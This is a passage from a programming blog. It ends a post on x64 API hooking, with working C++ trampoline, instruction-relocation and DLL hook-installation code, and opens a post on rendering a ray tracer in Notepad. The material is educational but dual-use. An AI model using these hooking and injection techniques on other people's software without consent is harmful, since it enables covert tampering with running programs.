<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int8_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int16_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int32_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="c1">//returns the first module called "name" -> only searches for dll name, not whole path</span>
<span class="c1">//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"</span>
<span class="n">HMODULE</span> <span class="nf">FindModuleInProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lowerCaseName</span> <span class="o">=</span> <span class="n">_strdup</span><span class="p">(</span><span class="n">name</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">name</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">remoteProcessName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">MODULEINFO</span> <span class="n">remoteProcessModuleInfo</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">rebasedPath</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'\\'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">lastSlash</span><span class="p">)</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'/'</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">dllName</span> <span class="o">=</span> <span class="n">lastSlash</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">dllName</span><span class="p">,</span> <span class="n">lowerCaseName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">GetModuleInformation</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="o">&</span><span class="n">remoteProcessModuleInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MODULEINFO</span><span class="p">));</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="n">remoteProcessModule</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">gdiPlusModule</span> <span class="o">=</span> <span class="n">FindModuleInProcess</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="s">"gdiplus.dll"</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">localHookFunc4</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">gdiPlusModule</span><span class="p">,</span> <span class="p">(</span><span class="s">"GdipSetSolidFillColor"</span><span class="p">));</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">localHookFunc4</span><span class="p">,</span> <span class="n">GdipSetSolidFillColorPayload</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<h2 id="where-to-go-next">Where to Go Next</h2>
<p>Despite being by far the longest post I’ve written to date, this rabbit hole goes a whole lot deeper than what I’ve written about here.</p>
<p>First of all, there are significant issues with the code written in this post:</p>
<ul>
<li>There’s no way to uninstall hooks</li>
<li>Hooking 32 bit applications isn’t supported at all</li>
<li>Everything breaks if 2 hooked functions share a payload</li>
<li>Stuff also breaks if a thread is executing instructions while they’re being stolen</li>
<li>More stuff breaks if the stolen instructions for a function use the r10 register</li>
<li>There are at least 3 additional scary problems I don’t know about yet</li>
</ul>
<p>I solve some of these problems (at least in a “good enough” sorta way) in my <a href="https://github.com/khalladay/hooking-by-example">hooking-by-example</a> repo, but others are left, I suppose, as an exercise for the reader. If you want to learn more, the sources for <a href="https://github.com/microsoft/Detours">Detours</a>, <a href="https://github.com/TsudaKageyu/minhook">Minhook</a>, <a href="https://easyhook.github.io/">Easyhook</a> and <a href="https://github.com/stevemk14ebr/PolyHook">Polyhook</a> might be of interest. I found the Polyhook code the easiest to read, for whatever that’s worth.</p>
<p>There’s also some really cool approaches to function hooking that don’t require you to know the function signature of what you’re hooking. I haven’t delved into this at all, but I’ve had <a href="https://github.com/vovkos/protolesshooks">this github repo</a> starred for awhile now.</p>
<p>Lastly, there’s a whole world of other hooking techniques out there. One that seems particularly interesting to me is import address table hooking, which <a href="https://renderdoc.org/">RenderDoc</a> uses. I expect I’ll lose several weekends to this very soon.</p>
<h2 id="final-thoughts">Final Thoughts</h2>
<p>I’ve written a lot already, so I’ll keep my sign off short. There are two things that I didn’t find room to mention in the ocean of text above that I think warrant a mention:</p>
<ol>
<li>If you try to disassemble a function that you have breakpoints set in, you’re going to have a bad time.</li>
<li>To debug an injected dll, attach your debugger to the process the dll was injected into.</li>
</ol>
<p>Finally, my twitter handle is <a href="https://twitter.com/khalladay">@khalladay</a>. Send me questions or comments or whatever there. I’ll probably respond, unless I’m tired that day and forget to come back to it later.</p>
Ray Tracing In Notepad.exe At 30 FPS2020-05-20T00:00:00+00:00http://kylehalladay.com/blog/2020/05/20/Rendering-With-Notepad<p>A few months back, there was a post on Reddit (<a href="https://www.reddit.com/r/gamedev/comments/f1oidu/how_i_made_a_game_played_in_notepad/">link</a>), which described a game that used an open source clone of Notepad to handle all its input and rendering. While reading about it, I had the thought that it would be really cool to see something similar that worked with stock Windows Notepad. Then I spent way too much of my free time doing exactly that.</p>
<p>I ended up making a Snake game and a small ray tracer that use stock Notepad for all input and rendering tasks, and got to learn about DLL Injection, API Hooking and Memory Scanning along the way. It seemed like writing up the stuff I learned might make for an interesting read, and give me a chance to show off the dumb stuff I built at the same time, so that’s what these next couple blog posts will be about.</p>
<p>Due to length, I’ve split the writeup into two blog posts. This first post will talk about how Memory Scanners work, and how I used one to turn notepad.exe into a 30+ fps capable render target. I’ll also talk about the ray tracer that I built that rendered into Notepad.</p>
<p>The <a href="/blog/2020/05/20/Hooking-Input-Snake-In-Notepad.html">second post</a> will talk about using windows hooks to capture input and share the Snake game I built that uses pretty much all the stuff described in both of these posts.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/rt2.gif" />
<font size="2">This post will cover how I made Notepad do this</font>
<br /><br />
</div>
<p>If you just want to see the code, the whole project (including both the ray tracer and snake game) is up <a href="https://github.com/khalladay/render-with-notepad">on github</a>.</p>
<h2 id="sending-key-events-to-notepad">Sending Key Events To Notepad</h2>
<p>The obvious place to kick all of this off is it to talk about sending key events to a running instance of Notepad. This was the boring part of the project so I’ll be brief.</p>
<p>If you’ve never built an app out of Win32 controls (like I hadn’t), you might be surprised to learn that every UI element, from a menu bar to a button is technically it’s own “window,” and sending key input to a program involves sending that input to the UI element you want to receive it. Luckily Visual Studio comes with a tool called <a href="https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-start-spy-increment?view=vs-2019">Spy++</a> that can list all the windows that make up a given application.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/spy.PNG" />
<font size="2">The windows listed for Notepad in Spy++</font>
<br /><br />
</div>
<p>Spy++ revealed that the Notepad child window I was after was the “Edit” window. Once I knew that, it was just a matter of figuring out the right mix of Win32 function calls to get an HWND for that UI element, and then sending key inputs there. Getting that HWND looked something like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">HWND</span> <span class="nf">GetWindowForProcessAndClassName</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">pid</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">className</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HWND</span> <span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetTopWindow</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">//0 arg means to get the window at the top of the Z order</span>
<span class="kt">char</span> <span class="n">classNameBuf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">curWnd</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">){</span>
<span class="n">DWORD</span> <span class="n">curPid</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">dwThreadId</span> <span class="o">=</span> <span class="n">GetWindowThreadProcessId</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="o">&</span><span class="n">curPid</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">curPid</span> <span class="o">==</span> <span class="n">pid</span><span class="p">){</span>
<span class="n">GetClassName</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">className</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="n">curWnd</span><span class="p">;</span>
<span class="n">HWND</span> <span class="n">childWindow</span> <span class="o">=</span> <span class="n">FindWindowEx</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">className</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">childWindow</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="n">childWindow</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetNextWindow</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">GW_HWNDNEXT</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Once I had the HWND for the right control, drawing a character in Notepad’s edit control was just a matter of using <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-postmessagea">PostMessage</a> to send a WM_CHAR event to it.</p>
